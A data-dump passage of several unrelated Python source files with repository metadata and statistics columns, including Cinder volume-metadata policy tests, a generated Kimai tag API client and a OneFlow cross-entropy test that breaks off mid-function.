| 45.654676 | 120 | 0.514795 | 4,633 | 57,114 | 6.090006 | 0.075329 | 0.059543 | 0.029984 | 0.021549 | 0.871274 | 0.843346 | 0.806131 | 0.777671 | 0.744852 | 0.725536 | 0 | 0.010216 | 0.374409 | 57,114 | 1,250 | 121 | 45.6912 | 0.779457 | 0.017001 | 0 | 0.560699 | 0 | 0 | 0.186398 | 0.04282 | 0 | 0 | 0 | 0 | 0.08559 | 1 | 0.048035 | false | 0.000873 | 0.012227 | 0.000873 | 0.067249 | 0.026201 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4c7ad4336fb8d3d30bd34b2831765abf4b8f8e03 | 40 | py | Python | python/eskapade/data_mimic/__init__.py | mbaak/Eskapade | 00c8f6ca52eb5b738b4268257e277dab71b804cb | [
"Apache-2.0"
] | 16 | 2016-10-10T08:39:30.000Z | 2020-12-22T01:00:56.000Z | python/eskapade/data_mimic/__init__.py | mbaak/Eskapade | 00c8f6ca52eb5b738b4268257e277dab71b804cb | [
"Apache-2.0"
] | null | null | null | python/eskapade/data_mimic/__init__.py | mbaak/Eskapade | 00c8f6ca52eb5b738b4268257e277dab71b804cb | [
"Apache-2.0"
] | 6 | 2017-06-14T12:01:41.000Z | 2018-04-03T17:01:04.000Z | from eskapade.data_mimic.links import *
| 20 | 39 | 0.825 | 6 | 40 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 40 | 1 | 40 | 40 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d5c9c6540f1bf069cc8ad0527adf2f7e03aba244 | 141 | py | Python | ps_signal/interfaces/cli/__init__.py | golgor/ps_signal | 0dc93bd3a88d30778968eb102435ffc8cb69a5fb | [
"MIT"
] | 1 | 2021-08-02T22:46:34.000Z | 2021-08-02T22:46:34.000Z | ps_signal/interfaces/cli/__init__.py | golgor/ps-signal | 0dc93bd3a88d30778968eb102435ffc8cb69a5fb | [
"MIT"
] | 7 | 2020-07-04T13:14:12.000Z | 2020-07-07T12:27:30.000Z | ps_signal/interfaces/cli/__init__.py | golgor/ps_signal | 0dc93bd3a88d30778968eb102435ffc8cb69a5fb | [
"MIT"
] | null | null | null | """Package that implements a CLI. Import structure will make the entry point
of this package to :func:`.cli.run_cli`.
"""
from .cli import *
| 28.2 | 76 | 0.730496 | 23 | 141 | 4.434783 | 0.782609 | 0.176471 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156028 | 141 | 4 | 77 | 35.25 | 0.857143 | 0.808511 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d5d37be981e99b36e909f2ac73f9cab68780b13f | 62 | py | Python | calculations/conftest.py | gabrielfior/etf-portfolio-backtesting | 15ad62742cc2efe7f3ecb915481d68069ab0b4df | [
"MIT"
] | null | null | null | calculations/conftest.py | gabrielfior/etf-portfolio-backtesting | 15ad62742cc2efe7f3ecb915481d68069ab0b4df | [
"MIT"
] | null | null | null | calculations/conftest.py | gabrielfior/etf-portfolio-backtesting | 15ad62742cc2efe7f3ecb915481d68069ab0b4df | [
"MIT"
] | 1 | 2021-11-20T17:25:15.000Z | 2021-11-20T17:25:15.000Z | import pytest
@pytest.fixture()
def engine():
return 'oi' | 12.4 | 17 | 0.677419 | 8 | 62 | 5.25 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177419 | 62 | 5 | 18 | 12.4 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0.031746 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
d5f91bd60e22187b2d5e5f00628065d4c4a40f70 | 544 | py | Python | tests/test_check.py | kosyachniy/lib | 4174eb7b91b2c5908b47b353cc55cc617b74799f | [
"MIT"
] | null | null | null | tests/test_check.py | kosyachniy/lib | 4174eb7b91b2c5908b47b353cc55cc617b74799f | [
"MIT"
] | null | null | null | tests/test_check.py | kosyachniy/lib | 4174eb7b91b2c5908b47b353cc55cc617b74799f | [
"MIT"
] | null | null | null | from libdev.check import fake_phone, fake_login
def test_phone():
assert fake_phone(79000000001) == True
assert fake_phone('+79121231234') == True
assert fake_phone('79697366730') == False
def test_mail():
assert fake_login('test@check.ru') == True
assert fake_login('ASD@Qwe.rTy') == True
assert fake_login('ads@123.ru') == True
assert fake_login('polozhev@mail.ru') == False
def test_name():
assert fake_login('Тест') == True
assert fake_login('aSdR') == True
assert fake_login('Алексей') == False
| 28.631579 | 50 | 0.681985 | 75 | 544 | 4.746667 | 0.36 | 0.280899 | 0.275281 | 0.266854 | 0.117978 | 0 | 0 | 0 | 0 | 0 | 0 | 0.080178 | 0.174632 | 544 | 18 | 51 | 30.222222 | 0.712695 | 0 | 0 | 0 | 0 | 0 | 0.161765 | 0 | 0 | 0 | 0 | 0 | 0.714286 | 1 | 0.214286 | true | 0 | 0.071429 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
912a994f74b08b823bf6d645bc4d6befcd9e0884 | 44 | py | Python | grakn/__init__.py | sheikheddy/grakn-python | ef81bc7961ba3b39dd9d3ca9136b8bcbcdf61757 | [
"Apache-2.0"
] | null | null | null | grakn/__init__.py | sheikheddy/grakn-python | ef81bc7961ba3b39dd9d3ca9136b8bcbcdf61757 | [
"Apache-2.0"
] | null | null | null | grakn/__init__.py | sheikheddy/grakn-python | ef81bc7961ba3b39dd9d3ca9136b8bcbcdf61757 | [
"Apache-2.0"
] | null | null | null | from grakn.client import Client, GraknError
| 22 | 43 | 0.840909 | 6 | 44 | 6.166667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113636 | 44 | 1 | 44 | 44 | 0.948718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fc01467f7aade8766a7aa1e5e1404d70a701d735 | 44 | py | Python | test/__init__.py | kallyas/PythonAlgorithms | e9b4c8dddad101ef0ff4bd4786d506f34f6f4d80 | [
"MIT"
] | 1 | 2022-02-23T19:22:44.000Z | 2022-02-23T19:22:44.000Z | test/__init__.py | kallyas/PythonAlgorithms | e9b4c8dddad101ef0ff4bd4786d506f34f6f4d80 | [
"MIT"
] | null | null | null | test/__init__.py | kallyas/PythonAlgorithms | e9b4c8dddad101ef0ff4bd4786d506f34f6f4d80 | [
"MIT"
] | null | null | null | from maths import *
from conversion import * | 22 | 24 | 0.795455 | 6 | 44 | 5.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159091 | 44 | 2 | 24 | 22 | 0.945946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fc0d993035218ea3b677670cc46074f57adc4f33 | 8,397 | py | Python | cinder/tests/unit/policies/test_volume_metadata.py | lightsey/cinder | e03d68e42e57a63f8d0f3e177fb4287290612b24 | [
"Apache-2.0"
] | 3 | 2015-04-02T21:44:36.000Z | 2016-04-29T21:19:04.000Z | cinder/tests/unit/policies/test_volume_metadata.py | lightsey/cinder | e03d68e42e57a63f8d0f3e177fb4287290612b24 | [
"Apache-2.0"
] | 3 | 2016-04-29T21:45:26.000Z | 2016-05-04T19:41:23.000Z | cinder/tests/unit/policies/test_volume_metadata.py | lightsey/cinder | e03d68e42e57a63f8d0f3e177fb4287290612b24 | [
"Apache-2.0"
] | 4 | 2016-01-27T00:25:52.000Z | 2021-03-25T19:54:08.000Z | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from six.moves import http_client
from cinder.tests.unit.policies import test_base
from cinder.volume import api as volume_api
# TODO(yikun): The below policy test cases should be added:
# * IMAGE_METADATA_POLICY
class VolumePolicyTests(test_base.CinderPolicyTests):
def test_admin_can_get_metadata(self):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(admin_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_meta = response.json_body['metadata']
self.assertIn('k', res_meta)
self.assertEqual('v', res_meta['k'])
def test_owner_can_get_metadata(self):
user_context = self.user_context
volume = self._create_fake_volume(user_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(user_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_meta = response.json_body['metadata']
self.assertIn('k', res_meta)
self.assertEqual('v', res_meta['k'])
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_get_metadata_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context, metadata={"k": "v"})
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(non_owner_context, path, 'GET')
self.assertEqual(http_client.FORBIDDEN, response.status_int)
def test_admin_can_create_metadata(self):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k1": "v1"}}
response = self._get_request_response(admin_context, path, 'POST',
body=body)
self.assertEqual(http_client.OK, response.status_int)
def test_owner_can_create_metadata(self):
user_context = self.user_context
volume = self._create_fake_volume(user_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k1": "v1"}}
response = self._get_request_response(user_context, path, 'POST',
body=body)
self.assertEqual(http_client.OK, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_create_metadata_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context, metadata={"k": "v"})
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k1": "v1"}}
response = self._get_request_response(non_owner_context, path, 'POST',
body=body)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
def test_admin_can_delete_metadata(self):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata/%(key)s' % {
'project_id': admin_context.project_id, 'volume_id': volume.id,
'key': 'k'
}
response = self._get_request_response(admin_context, path, 'DELETE')
self.assertEqual(http_client.OK, response.status_int)
def test_owner_can_delete_metadata(self):
user_context = self.user_context
volume = self._create_fake_volume(user_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata/%(key)s' % {
'project_id': user_context.project_id, 'volume_id': volume.id,
'key': 'k'
}
response = self._get_request_response(user_context, path, 'DELETE')
self.assertEqual(http_client.OK, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_delete_metadata_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context, metadata={"k": "v"})
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata/%(key)s' % {
'project_id': non_owner_context.project_id,
'volume_id': volume.id,
'key': 'k'
}
response = self._get_request_response(non_owner_context, path,
'DELETE')
self.assertEqual(http_client.FORBIDDEN, response.status_int)
def test_admin_can_update_metadata(self):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k": "v2"}}
response = self._get_request_response(admin_context, path, 'PUT',
body=body)
self.assertEqual(http_client.OK, response.status_int)
res_meta = response.json_body['metadata']
self.assertIn('k', res_meta)
self.assertEqual('v2', res_meta['k'])
def test_owner_can_update_metadata(self):
user_context = self.user_context
volume = self._create_fake_volume(user_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k": "v2"}}
response = self._get_request_response(user_context, path, 'PUT',
body=body)
self.assertEqual(http_client.OK, response.status_int)
res_meta = response.json_body['metadata']
self.assertIn('k', res_meta)
self.assertEqual('v2', res_meta['k'])
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_update_metadata_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context, metadata={"k": "v"})
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k": "v2"}}
response = self._get_request_response(non_owner_context, path, 'PUT',
body=body)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
| 42.624365 | 78 | 0.642849 | 1,054 | 8,397 | 4.804554 | 0.126186 | 0.063981 | 0.047393 | 0.054502 | 0.85545 | 0.85545 | 0.85545 | 0.847749 | 0.84064 | 0.82425 | 0 | 0.004212 | 0.236632 | 8,397 | 196 | 79 | 42.841837 | 0.785803 | 0.074789 | 0 | 0.676056 | 0 | 0 | 0.135595 | 0.078958 | 0 | 0 | 0 | 0.005102 | 0.140845 | 1 | 0.084507 | false | 0 | 0.028169 | 0 | 0.119718 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc46b9ef63e008faf0b8892eba241d552e179d65 | 10,784 | py | Python | kimai_python/api/tag_api.py | kbancerz/kimai-python | c5401acca8fe8cfa7db486dee5a215bd7daea95b | [
"MIT"
] | 6 | 2019-12-19T16:01:58.000Z | 2022-01-19T18:10:16.000Z | kimai_python/api/tag_api.py | kbancerz/kimai-python | c5401acca8fe8cfa7db486dee5a215bd7daea95b | [
"MIT"
] | 4 | 2020-05-16T23:33:15.000Z | 2021-07-06T20:53:32.000Z | kimai_python/api/tag_api.py | kbancerz/kimai-python | c5401acca8fe8cfa7db486dee5a215bd7daea95b | [
"MIT"
] | 3 | 2020-05-16T23:14:13.000Z | 2021-06-30T08:53:11.000Z | # coding: utf-8
"""
Kimai 2 - API Docs
JSON API for the Kimai 2 time-tracking software. Read more about its usage in the [API documentation](https://www.kimai.org/documentation/rest-api.html) and then download a [Swagger file](doc.json) for import e.g. in Postman. Be aware: it is not yet considered stable and BC breaks might happen, especially when using code generation. The order of JSON attributes is not guaranteed. # noqa: E501
OpenAPI spec version: 0.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from kimai_python.api_client import ApiClient
class TagApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def api_tags_get(self, **kwargs): # noqa: E501
"""Fetch all existing tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_tags_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Search term to filter tag list
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.api_tags_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.api_tags_get_with_http_info(**kwargs) # noqa: E501
return data
def api_tags_get_with_http_info(self, **kwargs): # noqa: E501
"""Fetch all existing tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_tags_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Search term to filter tag list
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method api_tags_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['apiToken', 'apiUser'] # noqa: E501
return self.api_client.call_api(
'/api/tags', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[str]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def api_tags_id_delete(self, id, **kwargs): # noqa: E501
"""Delete a tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_tags_id_delete(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: Tag ID to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.api_tags_id_delete_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.api_tags_id_delete_with_http_info(id, **kwargs) # noqa: E501
return data
def api_tags_id_delete_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_tags_id_delete_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: Tag ID to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method api_tags_id_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `api_tags_id_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['apiToken', 'apiUser'] # noqa: E501
return self.api_client.call_api(
'/api/tags/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def api_tags_post(self, body, **kwargs): # noqa: E501
"""Creates a new tag # noqa: E501
Creates a new tag and returns it afterwards # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_tags_post(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param TagEditForm body: (required)
:return: TagEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.api_tags_post_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.api_tags_post_with_http_info(body, **kwargs) # noqa: E501
return data
def api_tags_post_with_http_info(self, body, **kwargs): # noqa: E501
"""Creates a new tag # noqa: E501
Creates a new tag and returns it afterwards # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_tags_post_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param TagEditForm body: (required)
:return: TagEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method api_tags_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `api_tags_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['apiToken', 'apiUser'] # noqa: E501
return self.api_client.call_api(
'/api/tags', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TagEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 35.946667 | 401 | 0.598943 | 1,297 | 10,784 | 4.738628 | 0.148805 | 0.044256 | 0.027335 | 0.035145 | 0.842825 | 0.834038 | 0.80947 | 0.787016 | 0.755776 | 0.755776 | 0 | 0.015072 | 0.310924 | 10,784 | 299 | 402 | 36.06689 | 0.812004 | 0.34681 | 0 | 0.692308 | 0 | 0 | 0.154025 | 0.030774 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044872 | false | 0 | 0.025641 | 0 | 0.134615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc5fac8c48d1f5f00bf55c7b10f9bd1033b5db9c | 9,816 | py | Python | python/oneflow/test/modules/test_sparse_softmax_cross_entropy.py | grybd/oneflow | 82237ad096a10527591660c09b61444c42917e69 | [
"Apache-2.0"
] | 1 | 2022-01-19T07:50:28.000Z | 2022-01-19T07:50:28.000Z | python/oneflow/test/modules/test_sparse_softmax_cross_entropy.py | grybd/oneflow | 82237ad096a10527591660c09b61444c42917e69 | [
"Apache-2.0"
] | null | null | null | python/oneflow/test/modules/test_sparse_softmax_cross_entropy.py | grybd/oneflow | 82237ad096a10527591660c09b61444c42917e69 | [
"Apache-2.0"
] | null | null | null | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import os
from collections import OrderedDict
import numpy as np
import torch
import oneflow as flow
import oneflow.unittest
from test_util import GenArgList, type_name_to_flow_type, type_name_to_np_type
def compare_with_torch(
device_type, data_type, label_type, batch_size, num_classes,
):
data_type = type_name_to_flow_type[data_type]
label_type = type_name_to_flow_type[label_type]
np_labels = np.random.randint(0, num_classes, size=(batch_size,)).astype(np.int32)
np_logits = np.random.random((batch_size, num_classes)).astype(np.float32)
torch_logits = torch.tensor(np_logits, dtype=torch.float32, requires_grad=True)
torch_labels = torch.tensor(np_labels, dtype=torch.int64)
torch_output = torch.nn.functional.cross_entropy(
torch_logits, torch_labels, reduction="none"
)
torch_output.sum().backward()
of_logits = flow.tensor(
np_logits, device=device_type, dtype=data_type, requires_grad=True
)
of_labels = flow.tensor(np_labels, device=device_type, dtype=label_type)
of_output = flow.nn.functional.sparse_softmax_cross_entropy(
labels=of_labels, logits=of_logits
).to(device_type)
of_output.sum().backward()
assert np.allclose(
of_output.numpy(), torch_output.detach().numpy(), rtol=1e-03, atol=1e-04
)
assert np.allclose(
of_logits.grad.numpy(), torch_logits.grad, rtol=1e-03, atol=1e-04
)
def compare_eager_consistent_with_torch(
device_type, data_type, label_type, batch_size, num_classes,
):
data_type = type_name_to_flow_type[data_type]
label_type = type_name_to_flow_type[label_type]
np_labels = np.random.randint(0, num_classes, size=(batch_size,)).astype(np.int32)
np_logits = np.random.random((batch_size, num_classes)).astype(np.float32)
placement = flow.placement(device_type, {0: range(4)})
rank = flow.env.get_rank()
if rank == 0:
torch_logits = torch.tensor(np_logits, dtype=torch.float32, requires_grad=True)
torch_labels = torch.tensor(np_labels, dtype=torch.int64)
torch_output = torch.nn.functional.cross_entropy(
torch_logits, torch_labels, reduction="none"
)
torch_output.sum().backward()
# 1D sbp
of_logits = flow.tensor(
np_logits, device=device_type, dtype=data_type, requires_grad=True
)
flow.comm.broadcast(of_logits, 0)
of_logits = of_logits.to_consistent(placement=placement, sbp=[flow.sbp.broadcast])
of_logits = of_logits.to_consistent(placement=placement, sbp=[flow.sbp.split(1)])
of_labels = flow.tensor(np_labels, device=device_type, dtype=label_type)
flow.comm.broadcast(of_labels, 0)
of_labels = of_labels.to_consistent(placement=placement, sbp=[flow.sbp.broadcast])
of_output = flow.nn.functional.sparse_softmax_cross_entropy(
labels=of_labels, logits=of_logits
).to(device_type)
of_output.sum().backward()
of_logits_grad = of_logits.grad.to_consistent(
placement=placement, sbp=[flow.sbp.broadcast]
)
of_logits_grad = of_logits_grad.to_local()
of_output = of_output.to_consistent(placement=placement, sbp=[flow.sbp.broadcast])
of_output = of_output.to_local()
if rank == 0:
assert np.allclose(
of_output.numpy(), torch_output.detach().numpy(), rtol=1e-03, atol=1e-04
)
assert np.allclose(
of_logits_grad.numpy(), torch_logits.grad, rtol=1e-03, atol=1e-04
)
def compare_eager_2d_consistent_with_torch(
device_type, data_type, label_type, batch_size, num_classes,
):
data_type = type_name_to_flow_type[data_type]
label_type = type_name_to_flow_type[label_type]
np_labels = np.random.randint(0, num_classes, size=(batch_size,)).astype(np.int32)
np_logits = np.random.random((batch_size, num_classes)).astype(np.float32)
rank = flow.env.get_rank()
if rank == 0:
torch_logits = torch.tensor(np_logits, dtype=torch.float32, requires_grad=True)
torch_labels = torch.tensor(np_labels, dtype=torch.int64)
torch_output = torch.nn.functional.cross_entropy(
torch_logits, torch_labels, reduction="none"
)
torch_output.sum().backward()
# 2D sbp
placement = flow.placement("cuda", {0: range(4)}, hierarchy=(2, 2))
of_logits = flow.tensor(
